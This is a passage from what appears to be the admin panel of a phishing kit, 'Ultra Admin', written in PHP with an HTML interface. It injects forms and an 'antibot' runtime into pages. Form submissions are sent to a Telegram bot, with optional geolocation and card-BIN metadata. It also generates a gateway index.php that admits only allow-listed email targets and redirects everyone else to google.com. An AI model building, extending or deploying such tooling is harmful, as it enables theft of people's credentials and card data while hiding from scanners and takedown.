    if (strpos($html,'antibot_runtime.php')===false){ $html = "<?php @include __DIR__.'/antibot_runtime.php'; ?>\n".$html; }
    if ($inject){
      if (preg_match('/<\/body>\s*<\/html>\s*$/i',$html)) $html = preg_replace('/<\/body>\s*<\/html>\s*$/i', $inject."</body>\n</html>", $html);
      else $html .= $inject;
      file_put_contents($path,$html);
    }
    if (!file_exists($FORMS_CORE_JS)) write_forms_core_js($FORMS_CORE_JS);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['delete_page'])) {
    $idx = intval($_POST['index'] ?? -1);
    $s = load_settings($SETTINGS_FILE);
    if (!isset($s['pages'][$idx])) { echo json_encode(['ok'=>0,'err'=>'Page not found']); exit; }
    array_splice($s['pages'], $idx, 1);
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['save_page_file'])) {
    $filename = basename($_POST['filename'] ?? '');
    $html     = $_POST['html'] ?? '';
    if (!preg_match('/^page_[a-z0-9]{8}\.php$/i', $filename)) { echo json_encode(['ok'=>0,'err'=>'Wrong filename']); exit; }
    if (file_exists($PAGES_DIR.$filename)) @copy($PAGES_DIR.$filename, $BACKUP_DIR . "/{$filename}.".date('Ymd_His').".bak");
    file_put_contents($PAGES_DIR.$filename, $html);
    echo json_encode(['ok'=>1]); exit;
  }

  /* ------- FORMS OPS (create / rename / delete) ---------- */
  if (isset($_GET['forms_ops'])) {
    $op = isset($_GET['forms_ops']) ? $_GET['forms_ops'] : '';
    $s  = load_settings($SETTINGS_FILE);

    if ($op === 'create') {
      $name = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['name'] ?? '');
      if (!$name) { echo json_encode(['ok'=>0,'err'=>'Bad name']); exit; }
      if (isset($s['forms'][$name])) { echo json_encode(['ok'=>0,'err'=>'Exists']); exit; }

      $s['forms'][$name] = [
        "fields"   => [],
        "behavior" => ["label"=>"Submit","telegram"=>false,"redirect"=>"","alert"=>"","webhook"=>"","tg_template"=>"pipe","tg_meta"=>["ua"=>true,"time"=>true,"geo"=>false,"bin"=>false],"tg_bin_field"=>"","js"=>""],
        "css"      => ""
      ];

      backup_settings($SETTINGS_FILE, $BACKUP_DIR);
      save_settings($SETTINGS_FILE, $s);
      write_forms_core_js($FORMS_CORE_JS);
      make_form_wrapper_js($FORMS_JS_DIR, $name);

      echo json_encode(['ok'=>1,'wrapper'=>"forms/form_".sanitize_form_name($name).".js",'fn'=>"inject_".sanitize_form_name($name)]); exit;
    }

    if ($op === 'rename') {
      $old = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['old'] ?? '');
      $new = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['new'] ?? '');
      if (!$old || !$new || !isset($s['forms'][$old])) { echo json_encode(['ok'=>0,'err'=>'Bad form']); exit; }
      if (isset($s['forms'][$new])) { echo json_encode(['ok'=>0,'err'=>'Exists']); exit; }

      $s['forms'][$new] = $s['forms'][$old]; unset($s['forms'][$old]);

      for ($i=0; $i<count($s['pages']); $i++){
        $p =& $s['pages'][$i];
        if (!isset($p['regions']) || !is_array($p['regions'])) continue;
        foreach ($p['regions'] as $rk=>&$r){
          $rt = $r['type'] ?? '';
          if ($rt==='form' && ($r['form']??'')===$old) { $r['form']=$new; }
          if ($rt==='forms' && !empty($r['forms']) && is_array($r['forms'])){
            $r['forms'] = array_map(function($fx) use($old,$new){ return $fx===$old ? $new : $fx; }, $r['forms']);
          }
        }
        unset($r);
      }
      unset($p);

      backup_settings($SETTINGS_FILE, $BACKUP_DIR);
      save_settings($SETTINGS_FILE, $s);

      @unlink($FORMS_JS_DIR.'/form_'.sanitize_form_name($old).'.js');
      write_forms_core_js($FORMS_CORE_JS);
      make_form_wrapper_js($FORMS_JS_DIR, $new);

      echo json_encode(['ok'=>1,'wrapper'=>"forms/form_".sanitize_form_name($new).".js",'fn'=>"inject_".sanitize_form_name($new)]); exit;
    }

    if ($op === 'delete') {
      $name = preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['name'] ?? '');
      if (!$name || !isset($s['forms'][$name])) { echo json_encode(['ok'=>0,'err'=>'Bad form']); exit; }

      unset($s['forms'][$name]);

      for ($i=0; $i<count($s['pages']); $i++){
        $p =& $s['pages'][$i];
        if (!isset($p['regions']) || !is_array($p['regions'])) continue;
        foreach ($p['regions'] as $rk=>&$r){
          $rt = $r['type'] ?? '';
          if ($rt==='form' && ($r['form']??'')===$name) {
            $r = ["type"=>"html","content"=>"<div class='alert alert-warning'>Form removed. Assign something else here.</div>"];
          }
          if ($rt==='forms' && !empty($r['forms']) && is_array($r['forms'])){
            $r['forms'] = array_values(array_filter($r['forms'], fn($fx)=>$fx!==$name));
          }
        }
        unset($r);
      }
      unset($p);

      backup_settings($SETTINGS_FILE, $BACKUP_DIR);
      save_settings($SETTINGS_FILE, $s);
      @unlink($FORMS_JS_DIR.'/form_'.sanitize_form_name($name).'.js');

      echo json_encode(['ok'=>1]); exit;
    }

    echo json_encode(['ok'=>0,'err'=>'Bad op']); exit;
  }
  /* --------- end forms_ops ---------- */

  if (isset($_GET['save_form'])) {
    $formName = preg_replace('/[^A-Za-z0-9_\-]+/','', $_GET['save_form']);
    $obj = json_decode(file_get_contents('php://input'), true);
    $s = load_settings($SETTINGS_FILE);
    if (!isset($s['forms'][$formName])) { echo json_encode(['ok'=>0,'err'=>'Form not found']); exit; }
    $s['forms'][$formName] = $obj;
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    write_forms_core_js($FORMS_CORE_JS);
    make_form_wrapper_js($FORMS_JS_DIR, $formName);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['save_widgets'])) { $widgets = json_decode(file_get_contents('php://input'), true); $s = load_settings($SETTINGS_FILE); $s['widgets']=$widgets; backup_settings($SETTINGS_FILE,$BACKUP_DIR); save_settings($SETTINGS_FILE,$s); echo json_encode(['ok'=>1]); exit; }
  if (isset($_GET['save_theme']))   { $theme   = json_decode(file_get_contents('php://input'), true); $s = load_settings($SETTINGS_FILE); $s['theme']=$theme;   backup_settings($SETTINGS_FILE,$BACKUP_DIR); save_settings($SETTINGS_FILE,$s); echo json_encode(['ok'=>1]); exit; }
  if (isset($_GET['save_telegram'])){ $tg      = json_decode(file_get_contents('php://input'), true); $s = load_settings($SETTINGS_FILE); $s['telegram']=$tg; backup_settings($SETTINGS_FILE,$BACKUP_DIR); save_settings($SETTINGS_FILE,$s); echo json_encode(['ok'=>1]); exit; }

  if (isset($_GET['export'])) { header('Content-Type: application/json; charset=utf-8'); header('Content-Disposition: attachment; filename="settings_export_'.date('Ymd_His').'.json"'); readfile($SETTINGS_FILE); exit; }
  if (isset($_GET['restore'])) {
    if (!isset($_FILES['file'])) { echo json_encode(['ok'=>0,'err'=>'No file']); exit; }
    $raw = file_get_contents($_FILES['file']['tmp_name']); json_decode($raw);
    if (json_last_error()!==JSON_ERROR_NONE) { echo json_encode(['ok'=>0,'err'=>'Invalid JSON']); exit; }
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    file_put_contents($SETTINGS_FILE, $raw);
    $s = load_settings($SETTINGS_FILE);
    rebuild_all_form_wrappers($FORMS_JS_DIR, $FORMS_CORE_JS, $s);
    build_antibot_runtime_and_js($s);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['list_backups'])) { $files=glob($BACKUP_DIR.'/*.json'); rsort($files); echo json_encode(['ok'=>1,'backups'=>array_map('basename',$files)]); exit; }
  if (isset($_GET['restore_backup'])) {
    $name = basename($_POST['name'] ?? ''); $path = $BACKUP_DIR.'/'.$name;
    if (!file_exists($path)) { echo json_encode(['ok'=>0,'err'=>'Backup not found']); exit; }
    @copy($SETTINGS_FILE, $BACKUP_DIR.'/settings_pre_restore_'.date('Ymd_His').'.json');
    @copy($path, $SETTINGS_FILE);
    $s = load_settings($SETTINGS_FILE);
    rebuild_all_form_wrappers($FORMS_JS_DIR, $FORMS_CORE_JS, $s);
    build_antibot_runtime_and_js($s);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['forms_rebuild'])) { $s=load_settings($SETTINGS_FILE); $n=rebuild_all_form_wrappers($FORMS_JS_DIR, $FORMS_CORE_JS, $s); echo json_encode(['ok'=>1,'count'=>$n]); exit; }

  /* AntiBot save/build */
  if (isset($_GET['save_antibot'])) {
    $ab = json_decode(file_get_contents('php://input'), true);
    $s  = load_settings($SETTINGS_FILE);
    $s['antibot'] = is_array($ab)? $ab : ["enabled_global"=>false,"apply_pages"=>[],"php_rules"=>"","js_rules"=>""];
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    build_antibot_runtime_and_js($s);
    echo json_encode(['ok'=>1]); exit;
  }
  if (isset($_GET['build_antibot'])) {
    $s = load_settings($SETTINGS_FILE);
    build_antibot_runtime_and_js($s);
    echo json_encode(['ok'=>1]); exit;
  }

  /* Domain/IP Access save + DOWNLOAD index.php (Server-B) */
  if (isset($_GET['save_domain_access'])) {
    $da = json_decode(file_get_contents('php://input'), true);
    $s = load_settings($SETTINGS_FILE);
    $s['domain_access'] = is_array($da)? $da : [];
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1]); exit;
  }
  if (isset($_GET['download_index'])) {
    $idx = intval($_POST['index'] ?? -1);
    $s   = load_settings($SETTINGS_FILE);
    $list = is_array($s['domain_access']??null)? $s['domain_access'] : [];
    if (!isset($list[$idx])) { http_response_code(404); exit; }
    $it = $list[$idx];

    $A_BASE   = $it['a_base'] ?? '';
    $FB       = $it['fallback_url'] ?? 'https://www.google.com';
    $TTL      = intval($it['session_ttl'] ?? 3600);
    $IPB      = $it['server_b_ip'] ?? '';
    $TAG_LEN  = max(3, intval($it['session_tag_len'] ?? 6));

    // NOTE: email allow-list logic (from allowed_email.txt)
    $index = "<?php\n".
      "/* Auto index for Server B — unified session id + masked tag (email allow-list aware) */\n".
      "ini_set('session.use_cookies',1); ini_set('session.use_only_cookies',1); ini_set('session.cookie_httponly',1);\n".
      "session_name('PHPSESSID');\n".
      "header('Cache-Control: no-store, no-cache, must-revalidate');\n".
      "\$A_BASE = ".var_export($A_BASE,true).";\n".
      "\$FB = ".var_export($FB,true).";\n".
      "\$IPB = ".var_export($IPB,true).";\n".
      "\$TAG_LEN = ".var_export($TAG_LEN,true).";\n".
      "\$ALLOWED = file_exists(__DIR__.'/allowed_email.txt') ? array_filter(array_map('strtolower', array_map('trim', file(__DIR__.'/allowed_email.txt')))) : [];\n".
      "\$qemail = isset(\$_GET['email']) ? strtolower(trim(\$_GET['email'])) : '';\n".
      "// Optional IP pin\n".
      "if(\$IPB && (!isset(\$_SERVER['SERVER_ADDR']) || \$_SERVER['SERVER_ADDR']!==\$IPB)){\n".
      "  header('Location: '.\$FB, true, 302); exit; }\n".
      "// If allow-list is non-empty, require ?email= and it must match\n".
      "if(!empty(\$ALLOWED)){\n".
      "  if(!\$qemail || !in_array(\$qemail, \$ALLOWED, true)){\n".
      "    header('Location: '.\$FB, true, 302); exit; }\n".
      "}\n".
      "// Start session only now (after email/IP checks)\n".
      "session_start(); \$sid = session_id();\n".
      "\$hash = substr(bin2hex(hash('sha256', \$sid, true)), 0, \$TAG_LEN);\n".
      "\$redir = rtrim(\$A_BASE, '/').'/#'.\$hash;\n".
      "header('X-Frame-Options: DENY'); header('X-Content-Type-Options: nosniff');\n".
      "header('Location: '.\$redir, true, 302); exit;";
    header('Content-Type: application/x-php; charset=utf-8');
    header('Content-Disposition: attachment; filename="index.php"');
    echo $index; exit;
  }
  if (isset($_GET['build_domain_gate'])) {
    $gate = "<?php /** domain gate placeholder **/ ?>";
    file_put_contents(__DIR__.'/domain_gate.php', $gate);
    echo json_encode(['ok'=>1]); exit;
  }

  echo json_encode(['ok'=>0,'err'=>'No route']); exit;
}

/* --------------- HTML UI --------------- */
?>
<!doctype html>
<html lang="en" dir="ltr">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>Ultra Admin — Light</title>

  <!-- Bootstrap + FontAwesome + Sortable -->
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/sortablejs@1.15.2/Sortable.min.js" defer></script>

  <style>
    :root{
      --brand:#2563EB; --brand-2:#22D3EE; --text:#0f172a; --muted:#475569;
      --bg:#F6FAFF; --panel:#ffffff; --grid: rgba(37,99,235,.07);
      --radius:16px; --shadow:0 8px 30px rgba(2,6,23,.08);
    }
    html,body{height:100%}
    body{
      font-family: "Inter", "Segoe UI", Tahoma, sans-serif; color:var(--text);
      background:
        radial-gradient(900px 600px at 80% -10%, rgba(34,211,238,.15), transparent 60%),
        radial-gradient(900px 600px at -10% 110%, rgba(37,99,235,.12), transparent 60%),
        linear-gradient(180deg, #F9FBFF 0%, #F3F7FF 100%);
      background-color: var(--bg);
      overflow-x:hidden;
    }
    .grid-overlay:before{
      content:""; position:fixed; inset:0; pointer-events:none; z-index:0;
      background-image:
        linear-gradient(to right, var(--grid) 1px, transparent 1px),
        linear-gradient(to bottom, var(--grid) 1px, transparent 1px);
      background-size: 32px 32px; animation: drift 18s linear infinite alternate;
    }
    @keyframes drift{ from{transform: translate3d(0,0,0);} to{transform: translate3d(12px,10px,0);} }
    .ua-shell{position:relative; z-index:1}
    .ua-topbar{ position:sticky; top:0; z-index:5; backdrop-filter: blur(8px);
      background: rgba(255,255,255,.75); border-bottom: 1px solid rgba(37,99,235,.15); }
    .ua-brand{ display:flex; align-items:center; gap:.6rem; font-weight:800; letter-spacing:.4px }
    .ua-brand .dot{ width:12px; height:12px; border-radius:50%;
      background: radial-gradient(circle at 30% 30%, var(--brand), var(--brand-2));
      box-shadow:0 0 18px #60a5fa88, 0 0 40px #22d3ee55; }
    .ua-sidebar{ min-width:260px; max-width:280px; background:var(--panel);
      border-inline:1px solid rgba(2,6,23,.06); box-shadow:var(--shadow); border-radius:var(--radius); }
    .ua-section-title{ font-size:.85rem; color:var(--muted); letter-spacing:.08em; text-transform:uppercase; padding-inline:1rem; margin-top:1rem; }
    .ua-item{ background:#fff; border:1px solid rgba(2,6,23,.08); border-radius:14px; padding:.6rem .75rem; margin:.4rem 0;
      transition:.2s ease; color:var(--text); text-decoration:none; box-shadow:0 2px 12px rgba(2,6,23,.04); }
    .ua-item:hover{ transform: translateY(-1px); border-color: rgba(37,99,235,.35); box-shadow: 0 8px 22px rgba(37,99,235,.10); }
    .ua-card{ background:#fff; border:1px solid rgba(2,6,23,.08); border-radius:var(--radius); box-shadow:var(--shadow); }
    .ua-hide{display:none!important}
    .btn-neon{ border:1px solid rgba(37,99,235,.35)!important; color:#0b1220; background: linear-gradient(90deg, var(--brand-2), var(--brand)); border-radius:14px; font-weight:700; transition:.2s ease; }
    .btn-neon:hover{ transform: translateY(-1px); box-shadow: 0 12px 30px rgba(37,99,235,.25); }
    .btn-outline-neon{ color:var(--brand); border:1px solid rgba(37,99,235,.45)!important; border-radius:14px;
      background:linear-gradient(180deg, rgba(37,99,235,.07), rgba(37,99,235,.03)); }
    .kbd{background:#eef2ff;border:1px solid #c7d2fe;padding:.15rem .45rem;border-radius:6px}
    .mini{font-size:.85rem;color:var(--muted)}
    .badge{background:#eff6ff;border:1px solid #bfdbfe;color:#1d4ed8}
    .ua-toast{ position:fixed; right:18px; bottom:18px; padding:.6rem .9rem; border-radius:12px;
      background:#0b1220; color:#eaf1ff; border:1px solid rgba(37,99,235,.35);
      box-shadow: 0 12px 28px rgba(2,6,23,.25); opacity:0; transform: translateY(8px);
      transition:.25s ease; z-index:99999; }
    .ua-toast.show{ opacity:1; transform: translateY(0) }
    .ua-success{ box-shadow: 0 8px 26px rgba(34,211,238,.25)}
    .ua-danger{ border-color: rgba(239,68,68,.55); box-shadow:0 8px 26px rgba(239,68,68,.25)}
    .ua-warning{ border-color: rgba(245,158,11,.55); box-shadow:0 8px 26px rgba(245,158,11,.25)}
    table.ua-grid-table thead th{ color:#1e40af; font-weight:600; border-bottom-color:#e2e8f0; }
    table.ua-grid-table td, table.ua-grid-table th{ background:transparent; border-color:#e2e8f0; vertical-align:middle; }
    textarea.code{ font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Courier New", monospace }
    .form-control, .form-select{ background:#fff!important; border:1px solid #cbd5e1!important; color:#0f172a!important; box-shadow:none!important; border-radius:12px; }
    .form-control:focus, .form-select:focus{ border-color:var(--brand)!important; box-shadow:0 0 0 .25rem rgba(37,99,235,.15)!important; }
    .modal-content{ background:#ffffff; color:var(--text); border:1px solid #e2e8f0; border-radius:16px }
    .modal-header{ border-bottom-color:#e2e8f0 } .modal-footer{ border-top-color:#e2e8f0 }
    .grip{cursor:grab;color:#64748b} .grip:active{cursor:grabbing}
    a, .link{ color:#1d4ed8; text-decoration:none } a:hover{ color:#1e40af }
    #pagePreview{ max-height: 65vh; overflow:auto }
  </style>
</head>
<body class="grid-overlay">

  <!-- Topbar -->
  <div class="ua-topbar border-bottom">
    <div class="container py-2 d-flex align-items-center justify-content-between">
      <div class="ua-brand">
        <span class="dot"></span>
        <span>Ultra Admin</span>
        <small class="mini ms-2">Light</small>
      </div>
      <div class="d-flex align-items-center gap-2">
        <a id="openPageLinkTop" class="btn btn-outline-neon btn-sm" href="#" target="_blank">
          <i class="fa fa-up-right-from-square"></i> Open page
        </a>
        <button id="btnBackups" class="btn btn-outline-neon btn-sm"><i class="fa fa-clock-rotate-left"></i> Backups</button>
        <button id="btnExport" class="btn btn-outline-neon btn-sm"><i class="fa fa-file-export"></i> Export</button>
        <button id="btnSaveAll" class="btn btn-neon btn-sm"><i class="fa fa-floppy-disk"></i> Save All</button>
        <button id="btnLogout" class="btn btn-outline-danger btn-sm"><i class="fa fa-right-from-bracket"></i> Logout</button>
      </div>
    </div>
  </div>

  <div class="ua-shell container my-4">
    <!-- Login -->
    <div id="login" class="row justify-content-center">
      <div class="col-md-5">
        <div class="ua-card p-4">
          <h4 class="mb-3"><i class="fa fa-shield-halved me-2"></i> Sign in</h4>
          <div class="mb-3">
            <label class="form-label">Password</label>
            <input id="pass" type="password" class="form-control" placeholder="••••••••">
          </div>
          <div class="d-flex align-items-center gap-2">
            <button id="btnLogin" class="btn btn-neon"><i class="fa fa-right-to-bracket"></i> Login</button>
            <span id="msg" class="mini text-warning"></span>
          </div>
        </div>
      </div>
    </div>

    <!-- App -->
    <div id="app" class="ua-hide">
      <div class="row g-3">
        <!-- Sidebar -->
        <div class="col-lg-3">
          <div class="ua-sidebar p-3">
            <div class="ua-section-title">Pages</div>
            <div class="d-flex gap-2 mb-2">
              <button id="btnCreatePage" class="btn btn-neon btn-sm w-100"><i class="fa fa-plus"></i> New page</button>
            </div>
            <div id="pagesList"></div>

            <div class="ua-section-title">Forms</div>
            <div class="d-flex gap-2 mb-2">
              <button id="btnNewForm" class="btn btn-neon btn-sm w-100"><i class="fa fa-plus"></i> New form</button>
            </div>
            <div id="formsList"></div>

            <div class="ua-section-title">Widgets</div>
            <div class="d-flex gap-2 mb-2">
              <button id="btnNewWidget" class="btn btn-neon btn-sm w-100"><i class="fa fa-plus"></i> New widget</button>
            </div>
            <div id="widgetsList"></div>
          </div>
        </div>

        <!-- Main -->
        <div class="col-lg-9">
          <!-- Page editor -->
          <div class="ua-card p-3 mb-3">
            <div class="d-flex align-items-center justify-content-between mb-2">
              <div class="d-flex align-items-center gap-2">
                <h5 class="m-0">Page editor</h5>
                <span class="mini">file: <span id="curFile" class="badge"></span></span>
              </div>
              <div class="d-flex gap-2">
                <button id="btnEditPageFile" class="btn btn-outline-neon btn-sm"><i class="fa fa-code"></i> Edit file</button>
                <button id="btnRetrofitPage" class="btn btn-outline-neon btn-sm"><i class="fa fa-wand-magic-sparkles"></i> Retrofit assets</button>
              </div>
            </div>

            <div class="row g-3">
              <div class="col-md-6">
                <label class="form-label">Display title</label>
                <input id="pageTitle" class="form-control" placeholder="Home, Landing ...">
              </div>
            </div>

            <div class="mt-3" id="regionsEditor"></div>
          </div>

          <!-- Live preview -->
          <div class="ua-card p-3 mb-4">
            <div class="d-flex align-items-center justify-content-between mb-2">
              <h6 class="m-0"><i class="fa fa-eye me-2"></i> Quick Preview</h6>
              <span class="mini">updates when saved</span>
            </div>
            <div id="pagePreview"></div>
          </div>

          <!-- Forms editor -->
          <div class="ua-card p-3 mb-3">
            <div class="d-flex align-items-center justify-content-between mb-2">
              <div class="d-flex align-items-center gap-2">
                <h5 class="m-0">Form editor</h5>
                <span class="mini">name: <span id="curForm" class="badge">—</span></span>
              </div>
              <div class="d-flex gap-2">
                <button id="btnRenameForm" class="btn btn-outline-neon btn-sm"><i class="fa fa-i-cursor"></i> Rename</button>
                <button id="btnDeleteForm" class="btn btn-outline-danger btn-sm"><i class="fa fa-trash"></i> Delete</button>
              </div>
            </div>

            <div class="table-responsive">
              <table class="table table-sm ua-grid-table align-middle" id="fieldsTable">
                <thead>
                  <tr>
                    <th style="width:28px"></th>
                    <th>name</th><th>label</th><th>type</th><th>placeholder</th>
                    <th class="text-center">req</th><th>pattern</th><th>min</th><th>max</th><th>js</th><th>css</th><th style="width:60px"></th>
                  </tr>
                </thead>
                <tbody></tbody>
              </table>
            </div>

            <div class="d-flex gap-2 mb-3">
              <button id="btnAddField" class="btn btn-neon btn-sm"><i class="fa fa-plus"></i> Add field</button>
              <button id="btnSaveForm" class="btn btn-outline-neon btn-sm"><i class="fa fa-floppy-disk"></i> Save form</button>
            </div>

            <div class="row g-3">
              <div class="col-md-3">
                <label class="form-label">Submit label</label>
                <input id="bh_label" class="form-control" value="Submit">
              </div>
              <div class="col-md-3">
                <label class="form-label">Alert message</label>
                <input id="bh_alert" class="form-control" placeholder="Submitted">
              </div>
              <div class="col-md-3">
                <label class="form-label">Webhook (optional)</label>
                <input id="bh_webhook" class="form-control" placeholder="https://...">
              </div>
              <div class="col-md-3">
                <label class="form-label">Redirect</label>
                <select id="bh_redirect" class="form-select"></select>
              </div>
              <div class="col-md-3 d-flex align-items-center pt-3">
                <div class="form-check">
                  <input id="bh_telegram" class="form-check-input" type="checkbox">
                  <label class="form-check-label">Send to Telegram</label>
                </div>
              </div>
              <div class="col-md-9">
                <label class="form-label">Custom CSS for the form</label>
                <textarea id="form_css" class="form-control code" rows="2" placeholder="max-width:520px;margin:auto"></textarea>
              </div>
            </div>
          </div>

          <!-- Widgets editor -->
          <div class="ua-card p-3 mb-3">
            <div class="d-flex align-items-center justify-content-between mb-2">
              <div class="d-flex align-items-center gap-2">
                <h5 class="m-0">Widget editor</h5>
                <span class="mini">name: <span id="curWidget" class="badge">—</span></span>
              </div>
              <div class="d-flex gap-2">
                <button id="btnRenameWidget" class="btn btn-outline-neon btn-sm"><i class="fa fa-i-cursor"></i> Rename</button>
                <button id="btnDeleteWidget" class="btn btn-outline-danger btn-sm"><i class="fa fa-trash"></i> Delete</button>
                <button id="btnSaveWidgets" class="btn btn-neon btn-sm"><i class="fa fa-floppy-disk"></i> Save</button>
              </div>
            </div>
            <label class="form-label">Widget HTML</label>
            <textarea id="widget_html" class="form-control code" rows="5" placeholder="<section>...</section>"></textarea>
          </div>

          <!-- Theme -->
          <div class="ua-card p-3 mb-3">
            <h5 class="mb-3"><i class="fa fa-palette me-2"></i> Theme</h5>
            <div class="row g-3">
              <div class="col-md-4">
                <label class="form-label">Font</label>
                <input id="th_font" class="form-control" placeholder="Inter, Segoe UI, Tahoma, sans-serif">
              </div>
              <div class="col-md-4">
                <label class="form-label">Primary color</label>
                <input id="th_color" class="form-control" value="#2563EB">
              </div>
              <div class="col-md-4">
                <label class="form-label">Background</label>
                <input id="th_bg" class="form-control" value="#F6FAFF">
              </div>
            </div>
            <div class="d-flex align-items-center gap-2 mt-3">
              <button id="btnSaveTheme" class="btn btn-neon btn-sm"><i class="fa fa-floppy-disk"></i> Save theme</button>
              <span class="mini">Preview:</span>
              <div id="themePreview" class="px-3 py-2 rounded" style="border:1px dashed rgba(37,99,235,.25)">Aa Bb Cc — 123</div>
            </div>
          </div>

          <!-- Telegram -->
          <div class="ua-card p-3 mb-3">
            <h5 class="mb-3"><i class="fa-brands fa-telegram me-2"></i> Telegram</h5>
            <div class="row g-3">
              <div class="col-md-6">
                <label class="form-label">Bot Token</label>
                <input id="tg_token" class="form-control" placeholder="12345:ABC...">
              </div>
              <div class="col-md-6">
                <label class="form-label">Chat ID</label>
                <input id="tg_chat" class="form-control" placeholder="12345678">
              </div>
            </div>
            <div class="mt-3">
              <button id="btnSaveTelegram" class="btn btn-neon btn-sm"><i class="fa fa-floppy-disk"></i> Save</button>
            </div>
          </div>

          <!-- Domain / IP Access + Server-B -->
          <div class="ua-card p-3 mb-3">
            <div class="d-flex align-items-center justify-content-between mb-2">
              <h5 class="m-0"><i class="fa fa-diagram-project me-2"></i> Domain / IP Access &amp; Server-B</h5>
              <div class="d-flex gap-2">
                <button id="btnDAAdd" class="btn btn-neon btn-sm"><i class="fa fa-plus"></i> Add target</button>
                <button id="btnDASave" class="btn btn-outline-neon btn-sm"><i class="fa fa-floppy-disk"></i> Save list</button>
                <button id="btnDABuild" class="btn btn-outline-neon btn-sm"><i class="fa fa-hammer"></i> Build Gate</button>
              </div>
            </div>
            <div id="daList"></div>
            <div class="mini mt-2">
              Downloaded <b>index.php</b> now accepts <code>?email=</code> and will only create session/redirect when it matches an entry in <b>allowed_email.txt</b> (if that file isn’t empty). Otherwise it falls back to the provided <i>Fallback URL</i>.
            </div>
          </div>

        </div>
      </div>
    </div>
  </div>

  <!-- Modal: DOM Picker -->
  <div class="modal fade" id="modalPicker" tabindex="-1">
    <div class="modal-dialog modal-xl modal-dialog-scrollable">
      <div class="modal-content">
        <div class="modal-header">
          <h6 class="modal-title"><i class="fa fa-crosshairs me-2"></i> Choose injection spot (real page)</h6>
          <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
        </div>
        <div class="modal-body p-0">
          <div class="p-2 border-bottom mini" id="pickerHint">Hover then <b>Click</b> to place — Click=inside • <b>Alt</b>=before • <b>Shift</b>=after • <b>Ctrl/Cmd</b>=replace</div>
          <iframe id="pickerFrame" style="width:100%;height:70vh;border:0"></iframe>
        </div>
        <div class="modal-footer">
          <span class="mini me-auto">Click=inside • Alt=before • Shift=after • Ctrl/Cmd=replace</span>
          <button type="button" class="btn btn-outline-neon" data-bs-dismiss="modal">Close</button>
        </div>
      </div>
    </div>
  </div>

  <!-- Modal: Page file editor -->
  <div class="modal fade" id="modalEditor" tabindex="-1">
    <div class="modal-dialog modal-xl modal-dialog-scrollable">
      <div class="modal-content">
        <div class="modal-header">
          <h6 class="modal-title"><i class="fa fa-code me-2"></i> Edit page file</h6>
          <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
        </div>
        <div class="modal-body">
          <textarea id="pageFileEditor" class="form-control code" rows="24" spellcheck="false"></textarea>
        </div>
        <div class="modal-footer">
          <button id="btnSavePageFile" class="btn btn-neon"><i class="fa fa-floppy-disk"></i> Save</button>
        </div>
      </div>
    </div>
  </div>

  <!-- Modal: Backups -->
  <div class="modal fade" id="modalBackups" tabindex="-1">
    <div class="modal-dialog">
      <div class="modal-content">
        <div class="modal-header"><h6 class="modal-title">Backups</h6><button type="button" class="btn-close" data-bs-dismiss="modal"></button></div>
        <div class="modal-body"><div id="backupList"></div></div>
        <div class="modal-footer"><button class="btn btn-outline-neon" data-bs-dismiss="modal">Close</button></div>
      </div>
    </div>
  </div>

  <!-- Scripts -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
  <script src="admin.php?asset=admin.js"></script>
</body>
</html>
